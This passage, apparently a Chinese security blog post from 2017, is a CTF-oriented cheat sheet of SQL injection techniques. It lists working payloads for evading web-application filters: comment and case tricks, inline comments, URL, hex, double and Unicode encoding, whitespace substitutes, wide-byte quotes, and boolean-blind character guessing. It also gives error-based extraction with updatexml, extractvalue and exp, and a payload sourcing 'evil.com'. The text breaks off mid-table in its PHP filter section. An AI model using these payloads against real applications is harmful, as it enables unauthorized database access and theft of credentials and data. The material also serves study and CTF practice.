<!DOCTYPE html>
<html lang="zh-CN">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />

<meta name="theme-color" content="#f8f5ec" />
<meta name="msapplication-navbutton-color" content="#f8f5ec">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="#f8f5ec">



  <meta name="description" content="各种注入姿势"/>




  <meta name="keywords" content="ctf, SQL注入, 八一" />



  <meta name="baidu-site-verification" content="HhUstaSjr0" />



  <meta name="google-site-verification" content="UA-102975942-1" />






  <link rel="alternate" href="/atom.xml" title="八一">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=2.6.0" />



<link rel="canonical" href="https://bay1.top/2017/10/27/各种注入姿势/"/>


<link rel="stylesheet" type="text/css" href="/css/style.css?v=2.6.0" />
<link rel="stylesheet" type="text/css" href="/css/prettify.css" media="screen" />
<link rel="stylesheet" type="text/css" href="/css/sons-of-obsidian.css" media="screen" />



  <link rel="stylesheet" type="text/css" href="/lib/fancybox/jquery.fancybox.css" />




  
  <script id="baidu_analytics">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?9a885cc9fb6cd7bcef579deb8efe8a70";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>



  <script id="google_analytics">
    (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
        (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
        m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
        })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

        ga('create', 'UA-102975942-1', 'auto');
        ga('send', 'pageview');
  </script>










    <title> 各种注入姿势 - 八一 </title>
  </head>

  <body><div id="mobile-navbar" class="mobile-navbar">
  <div class="mobile-header-logo">
    <a href="/." class="logo">八一</a>
  </div>
  <div class="mobile-navbar-icon">
    <span></span>
    <span></span>
    <span></span>
  </div>
</div>

<nav id="mobile-menu" class="mobile-menu slideout-menu">
  <ul class="mobile-menu-list">
    
      <a href="/archives">
        <li class="mobile-menu-item">
          
          
            文章
          
        </li>
      </a>
    
      <a href="/tags">
        <li class="mobile-menu-item">
          
          
            标签
          
        </li>
      </a>
    
      <a href="/about">
        <li class="mobile-menu-item">
          
          
            关于/友链
          
        </li>
      </a>
    
      <a href="/search">
        <li class="mobile-menu-item">
          
          
            站内搜索
          
        </li>
      </a>
    
  </ul>
</nav>

    <div class="container" id="mobile-panel">
      <header id="header" class="header"><div class="logo-wrapper">
  <a href="/." class="logo">八一</a>
</div>

<nav class="site-navbar">
  
    <ul id="menu" class="menu">
      
        <li class="menu-item">
          <a class="menu-item-link" href="/archives">
            
            
              文章
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/tags">
            
            
              标签
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/about">
            
            
              关于/友链
            
          </a>
        </li>
      
        <li class="menu-item">
          <a class="menu-item-link" href="/search">
            
            
              站内搜索
            
          </a>
        </li>
      
    </ul>
  
</nav>

      </header>

      <main id="main" class="main">
        <div class="content-wrapper">
          <div id="content" class="content">
            
  
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          各种注入姿势
        
      </h1>

      <div class="post-meta">
        <span class="post-time">
          2017-10-27
        </span>
        
        
        
      </div>
    </header>

    
    
  <div class="post-toc" id="post-toc">
    <h2 class="post-toc-title">文章目录</h2>
    <div class="post-toc-content">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#注入的一般流程"><span class="toc-text">注入的一般流程</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#waf拦截了columns-database-schema等关键字或函数"><span class="toc-text">waf拦截了columns,database,schema等关键字或函数</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Out-of-Band-注入"><span class="toc-text">Out-of-Band 注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#各种绕过"><span class="toc-text">各种绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#注释符"><span class="toc-text">注释符</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#大小写"><span class="toc-text">大小写</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#内联注释绕过"><span class="toc-text">内联注释绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#双关键字绕过"><span class="toc-text">双关键字绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#编码绕过"><span class="toc-text">编码绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#空格绕过"><span class="toc-text">空格绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#号拆解字符串绕过"><span class="toc-text">+,-,.号拆解字符串绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#like绕过"><span class="toc-text">like绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#in绕过"><span class="toc-text">in绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#gt-lt-绕过"><span class="toc-text">&gt;,&lt;绕过</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#等价函数与命令绕过"><span class="toc-text">等价函数与命令绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#函数或变量"><span class="toc-text">函数或变量</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#符号"><span class="toc-text">符号</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#生僻函数"><span class="toc-text">生僻函数</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#反引号-绕过"><span class="toc-text">反引号`绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#换行符绕过"><span class="toc-text">换行符绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#截断绕过"><span class="toc-text">截断绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#宽字节绕过"><span class="toc-text">宽字节绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#N绕过"><span class="toc-text">\N绕过</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#特殊的绕过函数"><span class="toc-text">特殊的绕过函数</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#PHP中一些常见的过滤方法及绕过方式"><span class="toc-text">PHP中一些常见的过滤方法及绕过方式</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#报错注入"><span class="toc-text">报错注入</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#延时注入脚本"><span class="toc-text">延时注入脚本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Mysql布尔盲注脚本"><span class="toc-text">Mysql布尔盲注脚本</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#注入中读取文件"><span class="toc-text">注入中读取文件</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#MYSQL"><span class="toc-text">MYSQL</span></a></li></ol></li></ol>
    </div>
  </div>


    <div class="post-content">
      
        <p>SQL的世界真的很丰富,这里记录一些网上搜集到的和自己见过的一些注入手段<br>也是方便自己查看,右侧栏可以选择目录 <a id="more"></a></p>
<h2 id="注入的一般流程"><a href="#注入的一般流程" class="headerlink" title="注入的一般流程"></a>注入的一般流程</h2><blockquote>
<p>以前写过一道题目</p>
</blockquote>
<p><a href="https://bayi87.github.io/2017/03/02/%E5%A4%A9%E6%9C%9D%E6%8C%96%E7%85%A4ctf/#phpmywind" target="_blank" rel="noopener">流程</a></p>
<h2 id="waf拦截了columns-database-schema等关键字或函数"><a href="#waf拦截了columns-database-schema等关键字或函数" class="headerlink" title="waf拦截了columns,database,schema等关键字或函数"></a>waf拦截了columns,database,schema等关键字或函数</h2><p><a href="http://www.wupco.cn/?p=4117" target="_blank" rel="noopener">mysql注入可报错时爆表名、字段名、库名</a></p>
<h2 id="Out-of-Band-注入"><a href="#Out-of-Band-注入" class="headerlink" title="Out-of-Band 注入"></a>Out-of-Band 注入</h2><p><a href="http://www.mottoin.com/96463.html" target="_blank" rel="noopener">MySQL Out-of-Band 攻击</a><br><a href="http://ceye.io/profile" target="_blank" rel="noopener">DNS监听平台</a></p>
<h2 id="各种绕过"><a href="#各种绕过" class="headerlink" title="各种绕过"></a>各种绕过</h2><h3 id="注释符"><a href="#注释符" class="headerlink" title="注释符"></a>注释符</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="regexp">//</span>, -- , <span class="regexp">/**/</span>, <span class="comment">#, --+, -- -, ;,%00,--a</span></span><br></pre></td></tr></table></figure>
<h3 id="大小写"><a href="#大小写" class="headerlink" title="大小写"></a>大小写</h3><blockquote>
<p>Union SeLeCt…</p>
</blockquote>
<h3 id="内联注释绕过"><a href="#内联注释绕过" class="headerlink" title="内联注释绕过"></a>内联注释绕过</h3><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">id=1<span class="comment">/*!UnIoN*/</span>+<span class="keyword">SeLeCT</span>+<span class="number">1</span>,<span class="number">2</span>,<span class="keyword">concat</span>(<span class="comment">/*!table_name*/</span>)+<span class="keyword">FrOM</span> <span class="comment">/*information_schema*/</span>.tables <span class="comment">/*!WHERE */</span>+<span class="comment">/*!TaBlE_ScHeMa*/</span>+<span class="keyword">like</span>+<span class="keyword">database</span>()<span class="comment">-- -</span></span><br></pre></td></tr></table></figure>
<blockquote>
<p>这里/**/注释在实际过程中似乎是行不通的,不知是版本限制还是什么原因</p>
</blockquote>
<h3 id="双关键字绕过"><a href="#双关键字绕过" class="headerlink" title="双关键字绕过"></a>双关键字绕过</h3><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=<span class="number">1</span>+UNIunionON+SeLselectECT+<span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>–</span><br></pre></td></tr></table></figure>
<h3 id="编码绕过"><a href="#编码绕过" class="headerlink" title="编码绕过"></a>编码绕过</h3><figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">or</span> <span class="number">1</span>=<span class="number">1</span>即<span class="symbol">%6</span>f<span class="symbol">%72</span><span class="symbol">%20</span><span class="symbol">%31</span><span class="symbol">%3</span>d<span class="symbol">%31</span>，而Test也可以为CHAR(<span class="number">101</span>)+CHAR(<span class="number">97</span>)+CHAR(<span class="number">115</span>)+CHAR(<span class="number">116</span>)。</span><br><span class="line"></span><br><span class="line">十六进制编码</span><br><span class="line"></span><br><span class="line">SELECT(<span class="keyword">extractvalue</span>(<span class="number">0x3C613E61646D696E3C2F613E</span>,<span class="number">0x2f61</span>))</span><br><span class="line"></span><br><span class="line">双重编码绕过</span><br><span class="line"></span><br><span class="line">?id=<span class="number">1</span><span class="symbol">%252</span>f<span class="symbol">%252</span>a*/UNION<span class="symbol">%252</span>f<span class="symbol">%252</span>a /SELECT<span class="symbol">%252</span>f<span class="symbol">%252</span>a*/<span class="number">1</span>,<span class="number">2</span>,password<span class="symbol">%252</span>f<span class="symbol">%252</span>a*/FROM<span class="symbol">%252</span>f<span class="symbol">%252</span>a*/Users--+</span><br><span class="line"></span><br><span class="line">一些unicode编码举例：    </span><br><span class="line">单引号：'</span><br><span class="line"><span class="symbol">%u0027</span> <span class="symbol">%u02b9</span> <span class="symbol">%u02bc</span></span><br><span class="line"><span class="symbol">%u02c8</span> <span class="symbol">%u2032</span></span><br><span class="line"><span class="symbol">%uff07</span> <span class="symbol">%c0</span><span class="symbol">%27</span></span><br><span class="line"><span class="symbol">%c0</span><span class="symbol">%a7</span> <span class="symbol">%e0</span><span class="symbol">%80</span><span class="symbol">%a7</span></span><br><span class="line">空白：</span><br><span class="line"><span class="symbol">%u0020</span> <span class="symbol">%uff00</span></span><br><span class="line"><span class="symbol">%c0</span><span class="symbol">%20</span> <span class="symbol">%c0</span><span class="symbol">%a0</span> <span class="symbol">%e0</span><span class="symbol">%80</span><span class="symbol">%a0</span></span><br><span class="line">左括号(:</span><br><span class="line"><span class="symbol">%u0028</span> <span class="symbol">%uff08</span></span><br><span class="line"><span class="symbol">%c0</span><span class="symbol">%28</span> <span class="symbol">%c0</span><span class="symbol">%a8</span></span><br><span class="line"><span class="symbol">%e0</span><span class="symbol">%80</span><span class="symbol">%a8</span></span><br><span class="line">右括号):</span><br><span class="line"><span class="symbol">%u0029</span> <span class="symbol">%uff09</span></span><br><span class="line"><span class="symbol">%c0</span><span class="symbol">%29</span> <span class="symbol">%c0</span><span class="symbol">%a9</span></span><br><span class="line"><span class="symbol">%e0</span><span class="symbol">%80</span><span class="symbol">%a9</span></span><br></pre></td></tr></table></figure>
<h3 id="空格绕过"><a href="#空格绕过" class="headerlink" title="空格绕过"></a>空格绕过</h3><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">两个空格代替一个空格，用Tab代替空格</span><br><span class="line"></span><br><span class="line">%<span class="number">20</span> %<span class="number">09</span> %<span class="number">0</span>a %<span class="number">0</span>b %<span class="number">0</span>c %<span class="number">0</span>d %a0 <span class="comment">/**/</span></span><br><span class="line"></span><br><span class="line">括号绕过空格</span><br><span class="line">在MySQL中，括号是用来包围子查询的。因此，任何可以计算出结果的语句，都可以用括号包围起来</span><br><span class="line">select(user())from dual where <span class="number">1</span>=<span class="number">1</span> and <span class="number">2</span>=<span class="number">2</span>;</span><br></pre></td></tr></table></figure>
<h3 id="号拆解字符串绕过"><a href="#号拆解字符串绕过" class="headerlink" title="+,-,.号拆解字符串绕过"></a>+,-,.号拆解字符串绕过</h3><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=<span class="number">1</span>' or '<span class="number">11</span>+<span class="number">11</span>'='<span class="number">11</span>+<span class="number">11</span>'</span><br><span class="line"><span class="string">"-"</span>和<span class="string">"."</span></span><br></pre></td></tr></table></figure>
<h3 id="like绕过"><a href="#like绕过" class="headerlink" title="like绕过"></a>like绕过</h3><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=<span class="number">1</span>' or <span class="number">1</span> like <span class="number">1</span> </span><br><span class="line">绕过对“=”，“&gt;”等的过滤</span><br></pre></td></tr></table></figure>
<h3 id="in绕过"><a href="#in绕过" class="headerlink" title="in绕过"></a>in绕过</h3><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">or</span> <span class="string">'1'</span> <span class="keyword">IN</span> (<span class="symbol">'swords</span>')</span><br></pre></td></tr></table></figure>
<h3 id="gt-lt-绕过"><a href="#gt-lt-绕过" class="headerlink" title="&gt;,&lt;绕过"></a>&gt;,&lt;绕过</h3><figure class="highlight ada"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">or</span> <span class="symbol">'password</span>' &gt; <span class="symbol">'pass</span>'</span><br><span class="line"><span class="keyword">or</span> <span class="number">1</span>&lt;<span class="number">3</span></span><br></pre></td></tr></table></figure>
<h2 id="等价函数与命令绕过"><a href="#等价函数与命令绕过" class="headerlink" title="等价函数与命令绕过"></a>等价函数与命令绕过</h2><h3 id="函数或变量"><a href="#函数或变量" class="headerlink" title="函数或变量"></a>函数或变量</h3><figure class="highlight erlang"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="title">hex</span><span class="params">()</span>、<span class="title">bin</span><span class="params">()</span> ==&gt; <span class="title">ascii</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="title">sleep</span><span class="params">()</span> ==&gt;<span class="title">benchmark</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="title">concat_ws</span><span class="params">()</span>==&gt;<span class="title">group_concat</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function"><span class="title">mid</span><span class="params">()</span>、<span class="title">substr</span><span class="params">()</span> ==&gt; <span class="title">substring</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">@@<span class="title">user</span> ==&gt; <span class="title">user</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">@@<span class="title">datadir</span> ==&gt; <span class="title">datadir</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">举例：<span class="title">substring</span><span class="params">()</span>和<span class="title">substr</span><span class="params">()</span>无法使用时：?<span class="title">id</span>=1+<span class="title">and</span>+<span class="title">ascii</span><span class="params">(lower(mid((select+pwd+from+users+limit+<span class="number">1</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>))</span>)=74　</span></span><br><span class="line"><span class="function"></span></span><br><span class="line"><span class="function">或者：</span></span><br><span class="line"><span class="function"><span class="title">substr</span><span class="params">((select 'password')</span>,1,1) = 0<span class="title">x70</span></span></span><br><span class="line"><span class="function"><span class="title">strcmp</span><span class="params">(left('password',<span class="number">1</span>), <span class="number">0</span>x69)</span> = 1</span></span><br><span class="line"><span class="function"><span class="title">strcmp</span><span class="params">(left('password',<span class="number">1</span>), <span class="number">0</span>x70)</span> = 0</span></span><br><span class="line"><span class="function"><span class="title">strcmp</span><span class="params">(left('password',<span class="number">1</span>), <span class="number">0</span>x71)</span> = -1</span></span><br></pre></td></tr></table></figure>
<h3 id="符号"><a href="#符号" class="headerlink" title="符号"></a>符号</h3><blockquote>
<p>and和or有可能不能使用，可以试下&amp;&amp;和||</p>
</blockquote>
<p>=不能使用的情况，可以考虑尝试&lt;、&gt;</p>
<h3 id="生僻函数"><a href="#生僻函数" class="headerlink" title="生僻函数"></a>生僻函数</h3><figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">MySQL/PostgreSQL支持XML函数：Select UpdateXML(‘&lt;script x=_&gt;&lt;/script&gt; ’,’/script/@x/’,’src=<span class="comment">//evil.com’);　　　　　　　　　　</span></span><br><span class="line"></span><br><span class="line">?id=<span class="number">1</span> and <span class="number">1</span>=(updatexml(<span class="number">1</span>,concat(<span class="number">0x3a</span>,(select user())),<span class="number">1</span>))</span><br><span class="line"></span><br><span class="line">SELECT xmlelement(name img,xmlattributes(<span class="number">1</span>as src,'a\l\x65rt(<span class="number">1</span>)'as \<span class="number">117</span>n\x65rror));　<span class="comment">//postgresql</span></span><br><span class="line"></span><br><span class="line">?id=<span class="number">1</span> and extractvalue(<span class="number">1</span>, concat(<span class="number">0x5c</span>, (select table_name from information_schema.tables limit <span class="number">1</span>)));</span><br><span class="line"></span><br><span class="line">and <span class="number">1</span>=(updatexml(<span class="number">1</span>,concat(<span class="number">0x5c</span>,(select user()),<span class="number">0x5c</span>),<span class="number">1</span>))</span><br><span class="line"></span><br><span class="line">and extractvalue(<span class="number">1</span>, concat(<span class="number">0x5c</span>, (select user()),<span class="number">0x5c</span>))</span><br></pre></td></tr></table></figure>
<h3 id="反引号-绕过"><a href="#反引号-绕过" class="headerlink" title="反引号`绕过"></a>反引号`绕过</h3><figure class="highlight n1ql"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">select</span> <span class="symbol">`version()`</span>，可以用来过空格和正则，特殊情况下还可以将其做注释符用</span><br></pre></td></tr></table></figure>
<h3 id="换行符绕过"><a href="#换行符绕过" class="headerlink" title="换行符绕过"></a>换行符绕过</h3><figure class="highlight mojolicious"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml"></span><span class="perl">%0a、%0d</span><span class="xml"></span></span><br></pre></td></tr></table></figure>
<h3 id="截断绕过"><a href="#截断绕过" class="headerlink" title="截断绕过"></a>截断绕过</h3><figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">%<span class="number">00</span>,%<span class="number">0</span>A,?,<span class="regexp">/0,/</span><span class="comment">///////////////........////////,%80-%99</span></span><br><span class="line"></span><br><span class="line">目录字符串，在window下<span class="number">256</span>字节、linux下<span class="number">4096</span>字节时会达到最大值，最大值长度之后的字符将被丢弃。</span><br><span class="line">.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>.<span class="regexp">/./</span>abc</span><br><span class="line"><span class="comment">////////////////////////abc</span></span><br><span class="line">..<span class="number">1</span><span class="regexp">/abc/</span>..<span class="regexp">/1/</span>abc<span class="regexp">/../</span><span class="number">1</span><span class="regexp">/abc</span></span><br></pre></td></tr></table></figure>
<h3 id="宽字节绕过"><a href="#宽字节绕过" class="headerlink" title="宽字节绕过"></a>宽字节绕过</h3><blockquote>
<p>过滤单引号时，可以试试宽字节</p>
</blockquote>
<figure class="highlight mojolicious"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="xml"></span><span class="perl">%bf%27 %df%27 %aa%27</span><span class="xml"></span></span><br></pre></td></tr></table></figure>
<h3 id="N绕过"><a href="#N绕过" class="headerlink" title="\N绕过"></a>\N绕过</h3><blockquote>
<p>\N其实相当于NULL字符</p>
</blockquote>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where <span class="attribute">id</span>=8E0union select 1,2,3,4,5,6,7,8,9,0</span><br><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where <span class="attribute">id</span>=8.0union select 1,2,3,4,5,6,7,8,9,0</span><br><span class="line">select * <span class="keyword">from</span><span class="built_in"> users </span>where <span class="attribute">id</span>=\Nunion select 1,2,3,4,5,6,7,8,9,0</span><br></pre></td></tr></table></figure>
<h3 id="特殊的绕过函数"><a href="#特殊的绕过函数" class="headerlink" title="特殊的绕过函数"></a>特殊的绕过函数</h3><li>通过greatest函数绕过不能使用大小于符号的情况</li>

<blockquote>
<p>greatest(a,b)，返回a和b中较大的那个数。<br>当我们要猜解user()第一个字符的ascii码是否小于等于150时，可使用</p>
</blockquote>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; select greatest(ascii(mid(user(),<span class="number">1</span>,<span class="number">1</span>)),<span class="number">150</span>)=<span class="number">150</span>;</span><br><span class="line"> +------------------------------------------+</span><br><span class="line">| greatest(ascii(mid(user(),<span class="number">1</span>,<span class="number">1</span>)),<span class="number">150</span>)=<span class="number">150</span> |</span><br><span class="line"> +------------------------------------------+</span><br><span class="line">|                                        <span class="number">1</span> |</span><br><span class="line"> +------------------------------------------+</span><br></pre></td></tr></table></figure>
<blockquote>
<p>如果小于150，则上述返回值为True</p>
</blockquote>
<li>通过substr函数绕过不能使用逗号的情况</li>

<figure class="highlight moonscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">mid(user() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)</span><br><span class="line">或</span><br><span class="line">substr(user() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)</span><br><span class="line">mysql&gt; <span class="built_in">select</span> ascii(substr(user() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)) &lt; <span class="number">150</span>;</span><br><span class="line"> +<span class="comment">------------------------------------------+</span></span><br><span class="line">| ascii(substr(user() <span class="keyword">from</span> <span class="number">1</span> <span class="keyword">for</span> <span class="number">1</span>)) &lt; <span class="number">150</span> |</span><br><span class="line"> +<span class="comment">------------------------------------------+</span></span><br><span class="line">|                                        <span class="number">1</span> |</span><br><span class="line"> +<span class="comment">------------------------------------------+</span></span><br></pre></td></tr></table></figure>
<li>使用数学运算函数在子查询中报错</li>

<blockquote>
<p>exp(x)函数的作用： 取常数e的x次方，其中，e是自然对数的底。</p>
</blockquote>
<p>~x 是一个一元运算符，将x按位取补</p>
<figure class="highlight cs"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">select</span> <span class="title">exp</span>(<span class="params">~(<span class="keyword">select</span>*<span class="keyword">from</span>(<span class="keyword">select</span> user(</span>))a))</span></span><br><span class="line"><span class="function">mysql报错：</span></span><br><span class="line"><span class="function">mysql&gt; <span class="keyword">select</span> <span class="title">exp</span>(<span class="params">~(<span class="keyword">select</span>*<span class="keyword">from</span>(<span class="keyword">select</span> user(</span>))a))</span>;</span><br><span class="line">ERROR <span class="number">1690</span> (<span class="number">22003</span>): DOUBLE <span class="keyword">value</span> <span class="keyword">is</span> <span class="keyword">out</span> of range <span class="keyword">in</span> ‘exp(~((<span class="keyword">select</span> ‘root@localhost’ <span class="keyword">from</span> dual)))’</span><br></pre></td></tr></table></figure>
<p>这条查询会出错，是因为exp(x)的参数x过大，超过了数值范围，分解到子查询，就是：</p>
<figure class="highlight moonscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">(<span class="built_in">select</span>*<span class="keyword">from</span>(<span class="built_in">select</span> user())a) 得到字符串 root@localhost</span><br></pre></td></tr></table></figure>
<p>表达式’root@localhost’被转换为0，按位取补之后得到一个非常的大数，它是MySQL中最大的无符号整数</p>
<h2 id="PHP中一些常见的过滤方法及绕过方式"><a href="#PHP中一些常见的过滤方法及绕过方式" class="headerlink" title="PHP中一些常见的过滤方法及绕过方式"></a>PHP中一些常见的过滤方法及绕过方式</h2><figure class="highlight sql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br></pre></td><td class="code"><pre><span class="line">过滤关键字    and or</span><br><span class="line">php代码    preg_match('/(and|or)/i',$id)</span><br><span class="line">会过滤的攻击代码    1 or 1=1 1 and 1=1</span><br><span class="line">绕过方式    1 || 1=1 1 